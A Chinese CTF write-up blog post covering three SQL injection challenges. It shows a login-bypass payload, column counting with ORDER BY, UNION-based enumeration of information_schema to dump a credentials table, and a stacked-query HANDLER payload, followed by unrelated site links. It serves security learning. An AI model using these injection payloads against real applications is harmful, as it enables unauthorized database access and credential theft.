当前位置: 首页 > news >正文

CTF_Day2

[极客大挑战 2019]EasySQL

这道题是非常基础的sql注入

进去之后就是一个登录界面,输入万能钥匙就能实现查到flag

1' or 1=1 # //用户名 1 //密码随意

[极客大挑战 2019]LoveSQL

这个也是sql注入的一种是命令执行注入

用万能钥匙注入后确实可以实现绕过,说明存在注入漏洞

但现在访问后没有flag,后尝试从别的角度入手,也许是还存在一个数据库可以访问,

从某一方面将union来实现访问一个网站后再访问另一个网站,也就是用union来拼接我们真正想要访问的;

但再用union之前先要知道访问的表里面有哪些是会出现回显的字段,

所以要先查表来就确定有几个字段

1' order by 4 #

order by 列名;

order by原本是 MySQL 原生语法:对查询结果按照某一列排序
它再sql注入时可以用来尝试测试有多少列,由于他的特性,在列数超过实际的列数时就会导致出现错误,可以这一特点来测试有多少列

当我用order by 3时会出现

代表访问不了而不是报错

代表当4时就已经超出了列数,表明要表内就是3列

后就是需要查阅相关的回显的是哪几列就输入一下内容

1' union select 1,2,3#

让后在后端运行的代码就是

select * from 表 where username='1'union select 1,2,3#' and password='1'

就是这样可以就看到是2和3位置是回显的,
可以看到3的字段都是password,尝试去进行爆破

select id,username,password from geekuser where username='$用户输入' and password='$pass'
select id,username,password from geekuser where username='1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #' and password='$pass'

拼接后就是这个样子,

就呢个够查到表的名称,看到另一个是l0ve1ysq1

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

不敢想现在的flag都是全随机的

[强网杯 2019]随便注

1';HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#
http://www.jsqmd.com/news/1379481/

相关文章:

  • GB/T 2423.17-2024《环境试验 第 2 部分:试验方法 试验 Ka:盐雾》新版标准完整解读(替代 2008 版)
  • Unity高效加载与播放GIF动画:从解码原理到性能优化实战
  • 库存成本核算5大方法:先进先出、加权平均一次讲透!
  • 浙江初三复读什么学校好?省内三所主流中考复读院校客观盘点 - 品牌测评网
  • 2026年中山市场口碑不错的GEO优化公司有哪些 - 甄选测评馆
  • C++虚继承构造函数调用链与内存布局深度解析
  • Git仓库完整迁移指南:镜像克隆、远程修改与历史重构
  • 2026年南京旅行社前十名:纯玩南京二日游旅行社,资质齐全中老年慢游跟团游实力测评 - 跟我去旅游
  • @Transactional 注解怎么用?
  • 火狐渗透版禁用JS破解CTF无限刷新难题
  • 霍邱中央空调品牌推荐:松下纳诺怡除醛+自有团队安装,8年服务近2000户的本地之选 - 滚动商讯
  • TrollInstallerX终极指南:iOS 14-16.6.1系统漏洞利用与TrollStore安装器
  • 第19届成图大赛国赛复盘:从CAD建模到创新设计的实战指南
  • 猫抓浏览器扩展:你的智能网页资源管家,轻松捕获一切在线媒体
  • 非线性磁链模型在无感FOC中的应用:原理、实现与开源库实战
  • Systemd 学习总结
  • 2026鲜蛋桃酥哪个牌子好?全品类正规品牌盘点、服务商选型标准及合作避坑指南 - 商业大观
  • 彻底解决Chrome WebDriver进程残留:从原理到实战的完整指南
  • 技术项目管理新思路:黑马白马分队策略如何激发团队创新与效率
  • 华为模拟器 eNSP 详细安装步骤(附常见问题解决)
  • 襄阳本地防水维修科普:漏水原因、施工方案与选择建议 - 筑宅安
  • 一念成仙机器人到底是什么?当一个机器有了头衔和卡片,它就变成游戏了吗?
  • 从一次工资字段读取说起,彻底理解 SAP Read Access Logging 与 OData V2 的审计边界
  • 痛风饮食安全算法:精准管理海鲜嘌呤摄入
  • 5分钟快速上手TronWeb:TRON区块链开发的终极指南
  • 挂号咨询相关问题解答 - GrowthUME
  • PDSCH接收链怎样验证?从EVM、LLR校准到BLER定位
  • AI Agent学习:RAG基础:构建Agent知识获取管道(李博杰《深入理解 AI Agent》3.2观后总结)
  • 广州先进封装半导体厂家推荐哪家好?2026年先进封装设备企业实力解析! - 趣谈科技事物
  • 从零构建MCP Server:为LangChain Agent扩展本地文件读取能力